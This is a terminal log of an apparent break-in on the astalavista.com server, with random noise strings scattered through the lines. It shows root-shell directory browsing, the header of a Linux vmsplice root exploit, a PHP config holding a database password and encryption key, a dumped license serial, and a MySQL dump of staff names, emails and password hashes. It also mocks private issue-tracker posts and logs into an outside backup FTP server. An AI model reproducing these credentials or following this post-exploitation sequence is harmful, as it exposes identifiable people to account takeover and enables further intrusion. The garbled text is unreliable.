2 C" }8 D/ j! U9 v; |7 T4 F$conxUser = ‘hostinguser’; // MySQL user+ w% b* J' U+ [$ p+ L
$conxPassword = ‘cXvB3981′; // MySQL password
* H$ [, r' Y3 l$ G$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish Q9 ^7 s% o. \5 I
?>! Y+ |8 e# P" u u+ {2 n
! X7 m7 ?, b/ y
sh-3.2# cd ..
% l6 O7 g5 W, K |sh-3.2# cd com* ^; f. `4 h! `6 V) H& n
sh-3.2# ls -la t# y/ w+ Q; U7 X" y7 }
total 141208; Z3 h- x$ h; G1 D* B8 K
drwx–x–x 10 com com 4096 Apr 28 12:40 .
8 k6 d8 |2 O: \( v( ` edrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
2 x9 s8 N1 W( f" ?% G4 t6 k1 Odrwx—— 2 com com 4096 Jun 4 04:04 backups ^0 X* t* [" }% K7 P+ ?! J
-rw-r–r– 1 root root 2419504 Sep 28 2007 backup.sql* q6 c6 y$ L5 V/ y; p
drwxr-xr-x 2 com com 4096 May 12 15:20 backup_system
; f8 ]% o+ Q8 I8 H) T-rw——- 1 com com 21880 Jun 2 08:07 .bash_history
% p' r$ U; S X O: V-rw-r–r– 1 com com 24 Sep 24 2007 .bash_logout
- ~% S& y8 m3 g-rw-r–r– 1 com com 176 Sep 24 2007 .bash_profile' v1 B+ U" w2 J8 C, Z5 f0 C
-rw-r–r– 1 com com 124 Sep 24 2007 .bashrc
5 t4 v+ F# C" o( x' ^" l: P8 e1 [drwx–x–x 3 com com 4096 Jan 29 2008 domains
) p# q/ r0 n& D- c4 [+ i-rw-r–r– 1 com com 16409 Jul 16 2008 FWUser.class.php.fixed# V Y0 U7 F5 l' b& L
drwxrwx— 3 com mail 4096 Jan 6 19:24 imap X! C" c. `, j) [, s
-rw——- 1 com com 69 Nov 18 2008 .lesshst
6 h, ~' i, t! Gdrwx—— 2 com com 4096 Sep 24 2007 mail
0 {5 V8 e- }/ B% m# _-rw——- 1 com com 13970 Mar 28 21:42 .mysql_history
% U# g/ D6 @! m( Hdrwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp! y: t1 v1 `8 p4 s, ~
lrwxrwxrwx 1 com com 37 Sep 24 2007 public_html -> ./domains/astalavista.com/public_html( I$ X. U- f! @1 K7 A: ? W+ e
-rw-r—– 1 com mail 34 Sep 24 2007 .shadow
% m5 k6 T* Q" Q- i6 I' Jdrwx—— 2 com com 4096 Aug 26 2008 .ssh( ]) `4 x; [- ^& t/ \
-rwx—— 1 com com 8515 Feb 10 2008 t3 h8 E( p$ l% m! V! v/ \
-rw-rw-r– 1 com com 6265 Feb 11 2008 t.c" x& E3 M" m$ N0 u! E- i
drwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp6 T2 b Y8 N: h' N
-rw-rw-r– 1 com com 617 May 20 2008 .toprc+ A& `+ U4 C! z$ s# [
-rw-rw-r– 1 com com 141851766 May 19 2008 version2-backup-20080519-0900.sql& p" S0 p6 u( L. w/ L. ]
-rw——- 1 com com 16629 Mar 28 21:46 .viminfo
/ @% c: d0 r- p( ~7 U6 y-rw-rw-r– 1 com com 51 Aug 25 2008 .vimrc% `" w4 _+ P# G5 w4 ], [
" I3 n8 ^9 e' c& m2 Wsh-3.2# head t.c3 O( A' Z& {0 T/ E7 a! P5 z
/* G7 c. h) L/ k
* jessica_biel_naked_in_my_bed.c- J& H$ L( `+ T, T: t! k G
*) u# T1 b2 P5 E% ?
* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.* D8 R! `! A9 }- X; W
* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.' @* n4 R7 _# d5 e: Z
* Stejnak je to stare jak cyp a aj jakesyk rozbite.
% J( R; U* F9 L2 q1 l*0 ?, K6 b% r7 H
* Linux vmsplice Local Root Exploit
: u' ?# D) Q* u; n' c* By qaaz
) Y) A' `2 ^2 D5 i$ U*
+ I5 ]% j& y7 N
( _+ n8 k2 M) u- D+ X+ Qsh-3.2# cd /& U) ^: D) V% K6 j
sh-3.2# ls -la; s' K2 M! L) K! `: A
total 3606 Z# I8 r( Y v/ C- p) [
drwxr-xr-x 25 root root 4096 Jun 3 02:43 .5 d2 n U( T5 a( W' L
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..5 h& O% Z" d6 P
-rw——- 1 root root 10240 Jun 3 02:39 aquota.group
- o1 A7 E; t8 {5 i# t9 I-rw——- 1 root root 10240 Jun 3 02:39 aquota.user$ k) k( U0 s% P" n# J( \
-rw-r—– 1 root root 819 Jul 17 2008 astalavista.us.db8 F/ k0 I" L% E, I) x: q( @
-rw-r–r– 1 root root 0 Jun 3 02:43 .autofsck
/ U$ L9 q5 F& }! z6 W1 P) b-rw-r–r– 1 root root 0 Sep 16 2007 .autorelabel
3 c- x3 H6 k" Xdrwxr-xr-x 3 root root 4096 Dec 29 2007 backup
3 T! _0 @, | a Y+ g+ a( w, v0 ]drwxr-xr-x 2 root root 4096 Jun 4 04:03 bin
' N% M A) T9 a8 idrwxr-xr-x 5 root root 4096 Jun 2 14:06 boot
- l4 c: d' l0 L% @3 K# e" {drwxr-xr-x 11 root root 3620 Jun 3 02:43 dev* o5 T, l8 O% \1 P* E1 S0 L
drwxr-xr-x 84 root root 12288 Jun 4 03:16 etc) B2 z. `5 R! e2 E# l
drwxr-xr-x 14 root root 4096 Mar 11 17:56 home
5 i; y0 |$ T$ K6 p' A-rw-r–r– 1 root root 13387 Mar 20 2008 httpd.conf
/ Q/ r$ r. E; [# Kdrwxr-xr-x 11 root root 4096 Jun 4 04:02 lib- D; Z" C% L, [- }; o) f: v0 o
drwxr-xr-x 7 root root 4096 Jun 4 04:03 lib64 S) K& d4 {* x6 @9 L; R3 ]
drwx—— 2 root root 16384 Sep 11 2007 lost+found$ U+ g& {, e' X+ r- u& U
drwxr-xr-x 2 root root 4096 Mar 11 17:56 media
. t7 p0 k+ v" J6 j V6 Ldrwxr-xr-x 2 root root 0 Jun 3 02:43 misc
0 G* O- ]2 M4 Edrwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt0 z: v8 y! O4 v7 F
-rw-r–r– 1 root root 5859 Feb 3 2008 mrtg.cfg8 L) e% Y0 i5 h. N; B7 {
drwxr-xr-x 2 root root 0 Jun 3 02:43 net2 K C+ c; j5 M" G, `: K
drwxr-xr-x 3 root root 4096 Mar 11 17:56 opt8 ~) ~& t$ k4 L" c5 S
dr-xr-xr-x 264 root root 0 Jun 3 02:42 proc
/ w# r- {# f" Hdrwxr-x— 15 root root 4096 Jun 4 08:40 root# C! _3 M5 t2 g) g* `
drwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin* k, A5 B) X9 t* N
drwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux
: T3 K. r% c, m9 G% R1 ldrwxr-xr-x 2 root root 4096 Mar 11 17:56 srv
9 T+ q/ W6 E* l" K4 K0 Q# C- Hdrwxr-xr-x 11 root root 0 Jun 3 02:42 sys
) K& N3 f* h% e! j m9 Qdrwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp& N& s2 C+ ^6 t K A" y# ~; q8 ?
drwxr-xr-x 16 root root 4096 Jun 2 13:56 usr
1 y9 q0 J% Q* v: |) kdrwxr-xr-x 26 root root 4096 Jun 4 03:16 var
" c7 E( E7 z3 J
+ W9 x! T7 v! Hsh-3.2# cd opt
; N) S7 R( j5 v+ r Bsh-3.2# ls -la
+ ?% e' m) J$ _: Q) W' Ktotal 20
. a! g/ {% j5 A, I( E0 _& fdrwxr-xr-x 3 root root 4096 Mar 11 17:56 .$ {5 h6 i- d! y4 E. n6 q1 z5 g
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
" k1 M2 v9 t9 {% h+ n$ ^drwxr-xr-x 15 root root 4096 Mar 20 2008 lsws
: ]9 t5 y. K L/ F
% B$ l2 E- X9 s5 n4 |8 ksh-3.2# cd lsws/
1 {; S/ \: E3 esh-3.2# ls -la
. Y' }6 A3 X& U1 e" Qtotal 108
, c5 a% N5 Y2 K4 G! O9 G4 d7 Odrwxr-xr-x 15 root root 4096 Mar 20 2008 .. ?; b8 ^7 V6 w! K
drwxr-xr-x 3 root root 4096 Mar 11 17:56 ..& c- k* H* b9 n# X
drwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons
* y. J! D8 j6 @! x, a' Hdrwxr-xr-x 13 root root 4096 May 29 15:10 admin+ o6 z" _4 X( _5 n* q1 ?, S- J% {% U
drwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate
}; v* z$ y9 O% s udrwxr-xr-x 2 root root 4096 May 29 15:10 bin
# d! ?7 _0 N6 Q; d9 ~drwx—— 4 apache apache 4096 Jun 3 02:43 conf- e9 d$ D$ x' A7 k L+ ]" [( `1 O
drwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT0 g1 z' M) P. v2 f, o. K
drwxr-xr-x 2 root root 4096 Sep 15 2008 docs
9 Q2 z* X* |/ z8 t" xdrwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin
) u8 d8 b% i9 r. Q! p, z+ `drwxr-xr-x 2 root root 4096 Sep 15 2008 lib
- E/ O+ }( R, n3 U-rw-r–r– 1 root root 6959 May 29 15:10 LICENSE! j4 @4 i `. l% D! K
-rw-r–r– 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP
1 _2 e% {. F- L% {( J9 g0 D" N-rw-r–r– 1 root root 6279 May 29 15:10 LICENSE.OpenSSL$ a3 o+ v' k9 O: h! ?( h6 L
-rw-r–r– 1 root root 3208 May 29 15:10 LICENSE.PHP
( ]2 ]' Z+ f: q) S4 \1 q: ^drwxr-xr-x 2 root root 20480 Jun 4 09:55 logs; ]' @) I/ y6 N7 c2 z
drwxr-xr-x 2 root root 4096 Mar 20 2008 php
9 Q& k& p- N! |drwx—— 2 apache apache 4096 Mar 20 2008 phpbuild% J5 T1 u% x$ A% [! t* c
drwxr-xr-x 3 root root 4096 Mar 20 2008 share
5 O7 J5 Q4 [5 o5 m/ T; L- _, G-rw-r–r– 1 root root 6 May 29 15:10 VERSION' w2 @# k# V4 n2 O% W; J3 ?; J0 L0 a7 o
, Y, Y7 E3 d5 R: L
sh-3.2# cd conf6 d S+ e4 l8 [8 L9 j" N
sh-3.2# ls -la
+ n9 D8 \/ ~8 _$ ttotal 48
, G/ [8 |# l& J+ C5 F- i& Fdrwx—— 4 apache apache 4096 Jun 3 02:43 .: w# Q5 f9 F4 R; _
drwxr-xr-x 15 root root 4096 Mar 20 2008 ..4 J3 t1 l& s& u
drwx—— 2 apache apache 4096 Mar 20 2008 cert
* b& f( U3 n5 H5 g9 `-rw-r–r– 1 apache apache 6668 May 29 15:13 httpd_config.xml
t- M9 |8 Q- h0 Q' B' l-rw——- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak1 C3 X1 l) m- a# B6 v+ |
-rw-r–r– 1 root apache 0 Jun 3 14:11 .last) o* Z2 a) ~* ?' o
-rw——- 1 apache apache 256 May 29 15:10 license.key/ F$ v; C- v* f3 s
-rw——- 1 apache apache 256 Mar 21 2008 license.key.old
" k& ?! {, n2 \, K6 f1 j! T' x-rw——- 1 apache apache 3320 Mar 20 2008 mime.properties
& u2 t0 }: O. a$ T-rw——- 1 apache apache 20 May 29 15:10 serial.no
# o8 ?; {. W9 n7 E" b3 y0 b- sdrwx—— 2 apache apache 4096 Mar 20 2008 templates
- N2 {* U' o2 R+ r' R$ C
& G; x: d; o$ I3 t8 `sh-3.2# cat serial.no: _% `& x; d- U2 |
IbDl-oVsO-CKqL-wVRa
% R4 B P# i+ g+ M2 |9 r' M7 d. _% w4 T1 N5 z& k
sh-3.2# mysql0 J6 S* W D& T7 B
Welcome to the MySQL monitor. Commands end with ; or \g.
2 p. B( S X& {0 B L; ^1 T" w% fYour MySQL connection id is 286844
. D! B+ n9 _0 P$ ?0 aServer version: 5.0.45-community-log MySQL Community Edition (GPL)5 s* D, o" ?5 T- ]
5 g$ ` I) B Y* F! t4 z
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
1 q# ^' z. V7 D' e+ x' \6 Z
$ L7 y6 q8 y1 g; |5 C0 Nmysql> show databases;$ b) S/ Y" G( g
+———————–+
; c( | r5 {( m$ T- J+ x9 {| Database |1 U* r, o5 j' R/ }0 L
+———————–+ m$ ?6 _& V1 I3 j/ [5 b+ v
| information_schema |: O# o/ H6 @# P7 @
| astanet_ads |
* U" o0 b$ A1 }, O( b; ?0 B; X% r0 I| astanet_mailing_lists |- _6 M! b: I( j
| astanet_mediawiki |* \( |6 I2 f( R/ D( |
| astanet_membersystem |
3 j) }' p& J8 Y. I$ H5 D; Z! z| com_contrexx |
4 N. g. K; C2 d T| com_contrexx2 |. k" S/ u# p& Y8 f" m
| com_contrexx2_live |3 r( t0 o+ j5 [: a$ Q9 q! {
| da_roundcube |
+ |# Q4 I( R) S" v# U" C! K, {: ~| dolphin |
9 D- \5 v! z3 h) N| ideapool |* R0 \/ Q; M( g, ~, i
| mysql |
- H# \0 J. H7 `8 n' S, B| test |3 z" i: R% u3 {! ^; d
| yourmaster |
8 ~1 r+ x- V" j% C9 u) _4 U) w+———————–+! V+ a1 c% v5 i) r
14 rows in set (0.00 sec)3 Y7 B0 ~7 r- B- d
% ?! A1 n+ z6 ]
mysql> use ideapool9 v1 |& D* O% D% w) R1 M
Database changed& U5 P2 z, w8 _ Y4 w
mysql> show tables;
0 d1 c3 G8 Z3 L; t& D) h0 w+ X+———————————–+
@# Y$ {$ F9 Y, o4 d| Tables_in_ideapool |) b* E- p6 w4 R$ D% c2 N
+———————————–+2 C2 w, E' p3 @3 C2 ^( J' [5 I
| eventum_columns_to_display |
' Q0 y9 q/ {1 Q! i| eventum_custom_field |4 W6 }6 F9 q- B6 t! v; h
| eventum_custom_field_option |
% O/ u2 y: f% c0 S5 S, M| eventum_custom_filter |* {# H# X1 k- M$ U7 J
| eventum_customer_account_manager |& A0 t1 o& S l
| eventum_customer_note |
& @# U0 G" g+ X2 H| eventum_email_account |; R2 q& y7 k1 Y5 z7 I4 q: Z6 p
| eventum_email_draft |
U2 B) |. _ T2 c) R4 F| eventum_email_draft_recipient |) F8 N6 S) Q- z7 Y: R
| eventum_email_response |
: G- M5 S9 d" J+ u| eventum_faq |
$ J1 a: }1 b9 D) U0 t' s9 G| eventum_faq_support_level |
9 Q# E) O2 ^- F2 c' Y! w3 m| eventum_group |
, z0 v/ z( r" I5 N* o- n/ g& f5 l! {| eventum_history_type |3 m" F- i! \) Z! w' O4 D( F7 H4 i. l
| eventum_irc_notice |
1 o# _8 D4 U; z# f| eventum_issue |
5 ]! M: l% X" k u- }5 m. P. `| eventum_issue_association |% ^$ @8 _! J) i( p- Q8 E
| eventum_issue_attachment | I( j9 i$ _- s( b8 S4 [9 O
| eventum_issue_attachment_file |
6 t ?" G& t' N| eventum_issue_checkin |. U* ^6 ]( T/ C" k6 s) p, S
| eventum_issue_custom_field |
$ K/ f7 h7 i) J' u: P| eventum_issue_history |+ E9 v+ {" H6 |' m7 X" w( o
| eventum_issue_quarantine |
- |; b/ E9 g& G2 z8 Q3 }3 s1 w| eventum_issue_requirement |! }- {% d' G8 s& W" D. \9 \
| eventum_issue_user |
2 e4 x9 _8 S& d9 p8 o| eventum_issue_user_replier |
3 L2 Z8 M% p7 x3 Z) C- y6 i| eventum_link_filter |. ]7 J6 \+ X6 ^; e/ j @" O
| eventum_mail_queue |, J, V( o+ F; t# C N
| eventum_mail_queue_log |
5 i0 U; ^# K$ X2 || eventum_news |; f% B8 P7 l/ l& H
| eventum_note |
~( s. L7 q1 G( b| eventum_phone_support |
. e0 N& u: F8 ?( V| eventum_project |
9 b# g0 C6 h3 V/ M1 n! T% `| eventum_project_category |3 A( T [% A2 V2 Y
| eventum_project_custom_field |
, u6 {! j+ e# @8 || eventum_project_email_response |, {6 W4 @% k `4 l
| eventum_project_field_display |
' t+ D4 I( H( }9 W4 Q| eventum_project_group |4 A2 O9 E* S$ N @8 Q
| eventum_project_link_filter |
0 J. Z _4 M3 P+ Q| eventum_project_news |% L; ^1 m- h8 h8 @2 f0 u ~: [( l
| eventum_project_phone_category |3 Z4 d# H3 y2 I. x. z
| eventum_project_priority |
+ s9 `4 y! E) J2 {| eventum_project_release |# Q: W, _1 ~( |$ S5 N
| eventum_project_round_robin |
5 ~9 R0 A- F3 N) ]; c: y5 Z| eventum_project_status |
; \7 N* _. H& l5 I+ q5 {| eventum_project_status_date |+ k# `1 D/ c2 D+ T% W1 k9 g
| eventum_project_user |( v2 c4 _: |5 v
| eventum_reminder_action |
7 O- x0 p1 ?- K( B/ N8 g| eventum_reminder_action_list |7 s* s* x; F# l' d9 }
| eventum_reminder_action_type |# f* O D; @! J. }, Q
| eventum_reminder_field |: f0 V% R' [1 o
| eventum_reminder_history |
7 w& i1 ~7 c* G0 S, V5 f- W/ k| eventum_reminder_level |
5 ^5 |5 i+ v) ?. F% B! \| eventum_reminder_level_condition |
+ w* K! T* a! \7 Q4 o| eventum_reminder_operator |3 `2 i5 |5 Q/ ]
| eventum_reminder_priority |" P+ @ ]$ ]& g! w+ Q% L/ ]+ l% E
| eventum_reminder_requirement |
( m7 r4 B4 c* `8 d/ B, w7 T6 B| eventum_reminder_triggered_action |
% z3 D9 q G/ J! M6 Y a+ a4 H) c| eventum_resolution |0 w7 z( N6 E9 ?" K5 T8 C
| eventum_round_robin_user |
6 ]) R; }0 B8 }4 e; `, ? [| eventum_search_profile |' j. G9 M8 W! m1 |9 R R
| eventum_status |4 h2 s2 z1 ~! B0 M! [4 j0 \
| eventum_subscription |
, u: h6 G+ s+ e( m# k| eventum_subscription_type |+ ^3 c# \* s- f+ @- H% }
| eventum_support_email |
( S6 G5 S: F: T4 C$ P; [) {0 w| eventum_support_email_body |
8 r+ }- ~! h2 i" m# h6 l| eventum_time_tracking |8 | [2 I: L, r1 w4 ?
| eventum_time_tracking_category |
5 G3 [ S) }, z& E" ?4 `| eventum_user |
, M" |3 w$ G; J1 n/ a5 x+———————————–+
3 ^, j, u* {1 N3 V69 rows in set (0.00 sec)6 E2 g& E/ l% X' u
- ?& H5 \/ T$ u+ D, J& g4 x- }
mysql> describe eventum_user;
, |" p0 B3 p9 f: j: q6 ~+————————-+——————+——+—–+———————+—————-+
+ Z8 \. O: w$ a1 t/ o- `3 i| Field | Type | Null | Key | Default | Extra |
6 {* a; [$ T) r4 k& Y+————————-+——————+——+—–+———————+—————-+
- x& r; H$ C, e| usr_id | int(11) unsigned | NO | PRI | NULL | auto_increment |; S' o( f9 R3 f- d. r1 ~1 g
| usr_grp_id | int(11) unsigned | YES | MUL | NULL | |& N' K* q* O0 Q
| usr_customer_id | int(11) unsigned | YES | | NULL | |+ A8 R& q: ?: W* |) O
| usr_customer_contact_id | int(11) unsigned | YES | | NULL | |
- I+ x0 H/ I* e$ s3 A| usr_created_date | datetime | NO | | 0000-00-00 00:00:00 | |
$ X5 K5 { J7 f/ u2 `| usr_status | varchar(8) | NO | | active | |# }) d7 X* c: Y) z/ |
| usr_password | varchar(32) | NO | | | |
% p) ^0 i( w$ y! m1 j, l9 N| usr_full_name | varchar(255) | NO | | | |2 y& O0 E, o+ V: _1 T
| usr_email | varchar(255) | NO | UNI | | |
6 I( g2 M" {. {4 o| usr_preferences | longtext | YES | | NULL | |
! \* @1 C/ X: `) Y: {& n| usr_sms_email | varchar(255) | YES | | NULL | |
* X0 p4 J" D% n2 x: D& D9 Q/ L| usr_clocked_in | tinyint(1) | YES | | 0 | |
( D/ \4 n+ P* M( k6 B| usr_lang | varchar(5) | YES | | NULL | |
# [( W" H0 A* c3 a5 E7 N1 P+————————-+——————+——+—–+———————+—————-+2 F& {9 _/ p+ R9 S; L, |6 F
13 rows in set (0.00 sec)
" k/ |/ |2 w3 [. h6 Q
9 f! O7 S5 } [& emysql> select usr_full_name,usr_email,usr_password from eventum_user;/ K; G! t# Y- d* l
+———————-+——————————-+———————————-+0 J$ m. t- i) X
| usr_full_name | usr_email | usr_password |
( R4 g* n, R$ @+———————-+——————————-+———————————-+
' e1 k% ~- h& }3 n: e| system | 链接标记system-account@example.com | 14589714398751513457adf349173434 |
$ |7 e' g+ u$ l% n L- |7 P| Developer (Paulo) | 链接标记paulo.santos@astalavista.ch | 26a35a1cf8895c27fb37ef4cf149f7bb |( C/ P- a; H) N! V
| Be1er0ph0r | 链接标记be1er0ph0r@gmx.de | 229766dc0ca1fb67160a8782321dfdce |. N5 y/ c: H# _$ ]; |
| Admin | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |$ D" T, K" a; `' }' [$ W3 w
| ADMIN | 链接标记admin@astalavista.ch | f6fdffe48c908deb0f4c3bd36c032e72 |
' T3 c5 S& |% D5 ?+ k| USER | 链接标记user@astalavista.ch | 5cc32e366c87c4cb49e4309b75f57d64 |
6 P8 r& Z$ _$ N' U| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com | f7735ab119023a8abb2301e67f81cd67 |4 ~. {/ F- x. ~0 j, `' C% N+ x, z
| Joao | 链接标记joao.pontes@astalavista.net | f805c071d7c823b937448c54c047b9fd |# Z. k3 f; X7 I8 h% F+ _
| Pascal | 链接标记pm@astalavista.ch | e10adc3949ba59abbe56e057f20f883e |2 H* X2 t* K: E! p* o
| commander | 链接标记commander@astalavista.com | 932cd250918f881d41feb0b93883a926 |
1 Z7 I8 M# @/ Q| ishtus | 链接标记ishtus@astalavista.com | a587ffc88b3dbbba3fd2fe67af649ff0 |/ Z; z/ }3 v8 e
| sykadul | 链接标记sykadul@astalavista.com | 20224a2f3eeb57a13a10b4df543c128e |
: f' _/ O9 j& v% A6 x% Q5 q| Zach McElroy | 链接标记admin@badfoo.net | 33c5d4954da881814420f3ba39772644 |
' k2 g0 [9 m5 ^6 ~. k# P% q| usb | 链接标记usbenigma@hushmail.com | b513f22c3db6932855ad732f5f8a10a2 |2 k6 Y. U2 ?" X# l! L
| cyph3r | 链接标记cyph3r@astalavista.com | 6e1e50017a945e874d52ec91f9ab2cee | X3 I- w1 s% e! p: {
+———————-+——————————-+———————————-+. A" T* Z: e2 i% ~( H
15 rows in set (0.00 sec)
. @: l2 X3 R0 F" U6 Y) G
# p) V% ?$ W {+ O+ S* e4 }& T2 Wmysql> select iss_description from eventum_issue where iss_id = 43;
, L7 }2 m( h$ }! x+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
+ J3 M" t1 d0 o. S| iss_description 5 |# E; d6 z( M- M# t
|5 F: \: i; X( K( U5 P' _$ t# D5 y
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
' @2 p% d* b' \- r7 f2 T| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be- }* i8 @6 Y+ b6 R; v
connected for 90 mins… 120mins… so what i propose is something like:
- z' M) X* X8 {* q7 @链接标记[url]http://www.surfthechannel.com/[/url], D8 B) |2 g* X, O+ e2 g/ q
since they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system4 ^0 o1 E# S: V9 S
like podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t& ?8 T% c3 D' h: O, M- A
break any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off8 ~6 F/ _5 U7 [/ q# _
if they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…
* B$ D4 Q* O. P% [) y) c. Q/ L" U& L' U4 d m$ S5 V, b9 Y" F
We could also put advertisement during play on the flash video player itself… extra $$…
% p d8 {$ O7 H C
* m) P5 y6 V# q/ @5 P: Z( M: ]" V5 KBy sykadul |
% x/ B0 p% @7 g5 f+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
! [5 i1 | Y8 e' k3 d1 row in set (0.00 sec)
+ }1 a5 l$ `, G+ ^
1 u! Y" Q: u6 z7 J5 t// Money and extra $$ is all they care about. remember that.
" M6 W4 @6 k/ d+ d6 h0 u, O6 I) G
mysql> select iss_summary,iss_description from eventum_issue where iss_id =42; G- m; i+ r0 H2 ?/ M- E; B
+————————+——————————————————————————————————————————————————————————————————————————————-+
: x) O9 V* o! ^0 k6 u# X| iss_summary | iss_description - }3 O7 W1 I* k) ?3 l B
|$ C% {) g' W$ v0 l
+————————+——————————————————————————————————————————————————————————————————————————————-+9 }# R6 c/ d, E7 _; L7 c
| Forum for REAL EXPERTS | Hello,+ M# a* q/ \( k
2 ~" `! {7 ?6 g f
Ishtus and I,
" P& x% A5 y7 S3 R2 V+ S1 u
! r+ T7 q. t" C, sCame up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide. i1 F$ s# K' b ?3 E# E( \( s
ONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..! W( V& e8 w! i/ O4 ^3 k
: _2 N9 e/ K* O- h0 FOne example a friend of mine from coresecurity.com!
7 R; N9 O: b- c9 L' Q) @8 `4 X( u' s" f; _& \1 T
We could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..
; \( p/ ~% q3 ]* U3 q+ z
1 ? d9 q# N3 B- |" W% o|2 Q5 J( n+ e, I3 J5 m( U! E
+————————+——————————————————————————————————————————————————————————————————————————————+2 G7 K1 U' w1 }6 @; ^
1 row in set (0.00 sec)
3 N/ K+ ~+ Z- A7 D" H2 H) }, C8 C- p" q
// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…
4 ?' p% @& U, M# n7 o& L& P1 s6 `7 ]
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;
' [! _, K: P" \" O5 n+——————+———————————————————————————————+
9 r, P) P- @0 Z! Q, d# n7 Q| iss_summary | iss_description |
5 O; b: L( F f0 t2 h+——————+———————————————————————————————+
- X1 b0 d$ B' ^6 I| Website guidance | Virtual Girl which guides you trought the website.- b: h- @6 C- u* `
$ v) W; X; g; [* q$ u2 e& u5 X
We need a girl with who you can ( talk )!!!8 [, _1 ~" @1 h$ K7 ^$ x
Also for the News!3 ?! ? ]$ ?0 {/ m& `- R
So my suggestion is a girl who read you the news loud if you like!
; o1 S, H2 Q( Z6 ~2 Myou can choose between read yourselfe or she read it for you or both!
- M) ^# a. _7 O" Y, B$ ]; s/ z4 G% P1 ~. U; I
Go to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!
* X- f, D0 J. T: i$ K; P7 S; |
3 ~3 g$ f! b ^1 |; _( oHave a look on the example girls!!9 Q) j# q V* P, A* l- y
* ^# w W3 t @! g
链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]2 Y/ O9 [/ x, c$ R
' ~! I8 v4 i6 T) |6 X* ~* k
or that
+ M- r: Z2 G+ J$ E) t' ]( n8 n( K4 H, W1 U8 X4 k' w+ ~- {
链接标记[url]http://www.yellostrom.de/[/url]
5 b2 H4 w2 Y* f
4 k* ]/ ]4 t$ ?: F. J& H|5 A( N8 z4 V" O/ U& q/ C9 T, Q i: ^
+——————+———————————————————————————————+- ], G7 r2 d" t' r1 `, q1 k
1 row in set (0.00 sec)0 {2 x! O3 p! b( `2 O
" O( ~- r9 p- s% X/ ~# l6 Q
// ha ha.
& S" m' y' l" X) I/ j
! w" N1 W0 X- X rmysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;
/ G) v8 v/ W$ u+ C+————————–+———————————————————————————————————–+
' N3 j. j, K+ F| iss_summary | iss_description |
2 T, x; ^ n3 b% ~* Q0 R; M+————————–+———————————————————————————————————–+
# I: p% @) N: [0 W/ w% | z| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name. |/ y/ I X J0 M
+————————–+———————————————————————————————————–+* u: y9 D6 B: }% r$ L3 J" v
1 row in set (0.00 sec)
0 D2 A# N( v7 V- }* `& W+ _. E% D2 N8 ?; \, d
// LOL.; @3 ?) {' U8 _6 d
. N7 {" h2 I4 N3 P, _mysql> exit' Y4 v7 b8 a- P' l
Bye3 t+ L( \: i+ H
! t1 }3 g( H) L, dsh-3.2# ftp 212.254.194.163
8 v0 @ f# M/ X7 O, FConnected to 212.254.194.163.. R( Y) h( m( q0 K1 @' @
220 BackupCOM_VW FTP server ready.
* m# D' J$ n' `* }: K504 AUTH: security mechanism ‘GSSAPI’ not supported.* K V1 h Y: p' i6 D' @/ {5 H
504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.
1 Z4 H2 { g2 j- L PKERBEROS_V4 rejected as an authentication type" a9 S+ i1 c$ B5 q" U2 L8 b4 O
Name (212.254.194.163:root): astalavista.com
) y. ?0 {8 o0 f: ^# X331 Password required for astalavista.com.7 Q( l+ P& T' b
Password:, k' r' H) e- \7 f: }
230 User astalavista.com logged in.3 @7 ~0 ^ L7 Q- O! a$ f& L$ w
Remote system type is UNIX. K; a9 T. G4 A3 u& D
Using binary mode to transfer files.
, R& @% A& ]( e6 @: c2 J$ bftp> ls -la
& @! [$ |7 A0 m3 I: |: |227 Entering Passive Mode (212,254,194,163,2,188)* l( o5 S8 I" S- i
150 Opening BINARY mode data connection for ‘file list’.
2 k. D% o' ?, k0 h& Y2 kdr-x—— 1 root users 4096 Jun 4 06:13 astalavista.com
y/ m; H% Y- V( p226 Transfer complete.! d$ q0 M4 ? @, A, N3 `. V
ftp> cd astalavista.com
' Q6 x; s, A0 _' S( p5 I5 k! Z/ l250 CWD command successful./ ~( C. t m4 |% c" K' d
ftp> ls -la; t' ?6 n0 W% U
227 Entering Passive Mode (212,254,194,163,2,189)
